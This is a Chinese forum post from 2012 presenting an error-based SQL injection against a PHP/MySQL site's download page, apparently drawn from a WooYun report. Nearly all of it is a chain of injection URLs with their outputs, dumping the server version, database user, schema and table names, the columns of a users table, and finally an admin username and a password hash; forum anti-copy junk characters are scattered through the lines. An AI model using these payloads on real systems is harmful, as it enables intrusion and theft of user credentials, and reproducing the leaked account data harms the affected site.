找回密码
 立即注册
查看: 2213|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666% v5 A! X& y+ Z( H5 W/ p' ~0 j

) J, `$ M3 t% R% f. D; V之前想找个测试 没想到这有 可以测试下做个记录而已 2 f; v9 ~1 M$ M! F8 u
3 S7 d1 g- t! @, V. i. }
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0031 @7 P: k! n% \0 A: M2 p4 @! e

% P9 ^5 n7 }) |( e" j" }/data0/htdocs/leqi_new/app/myapp.php* \3 r8 E6 K' G  K7 h+ T0 ^- Y
& e! [2 `- V* i: N; b. Q( }5 i  [
或者$ V2 {% Y( A  q& `" L

# k/ e, a, r( B/ I' }7 z; [# N/**********version()**********/ 5.1.49-log' l/ R. S: Z9 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. n* r: P2 z% I' {$ `
+ Z9 ?7 ?0 a$ k$ O1 |/ l+ u0 Z
/**********user()**********/  
! j' R/ j+ Y7 G$ `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ u8 c% x. o- J; e! f" P/ Q# m

" v  u- P4 M1 l) |0 `% c/**********database()**********/  leqi5 {" X9 O6 v  P! ^; P- M! D- w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! ?! Y% s# M- v: G0 [
; q( A4 Z, P4 {5 z' C3 I( Q
/**********limit依次递归爆库**********/* Z  F, j4 [2 \. ^3 |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 h1 Z2 y2 L- ~% k/ p5 ?7 ainformation_schema
) r8 h3 C& R9 C$ mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( Z: G# Z+ S$ y, f
leqi
  }" ^  m4 S, ?& W& ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) n1 R- D- n, L' M" W, P. A
test
+ r5 I+ Q8 H, C; T! j7 T% k, y! n
/**********limit依次递归爆表名**********/0 }; I/ ]& o9 d1 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) @. a0 J6 s: T8 e, M# T4 S1 l, Z
users# a. E. v0 T. I. r$ A* y) d2 Y

7 m" T- d/ ]' D/**********limit依次递归爆字段名**********/, o, r7 y8 d  B) p( H  f( N( c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! @+ S% T+ X  S0 ~  T0 Muser_id,username,nickname,passwd,group_id
. N- u% s6 V4 bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ Q6 `" y( |. _2 Q% d
/wapc/5000_0005_003
% u+ [5 m: J8 {- t: l2 _' d5 W  T5 }11 21
0 n: f" L- Y; t; D% m8 X, zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' e3 @; {: D: I6 T& D% o% [; F7 K
/wapc/5000_0005_003
$ i1 E& k" @% p# F% _11 341 351 361# w! M5 l9 Z- {- f% I% t" [- h
/**********爆数据**********/
3 _) V. F3 E. W/ n7 \5 G4 Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) Q6 W) z+ {" z+ B& ^; L& n0 `$ o& r& wadmin* h' @1 x; Y9 O, j% p: r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; F+ ~, O; S( q: p6a8b4574ca231eb8bd52764d4978ffcd
- u- n. J/ U8 {  \; S4 s% F0 t' r- v  n5 O  q1 h$ l
. T8 J4 A0 |: T' T8 X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表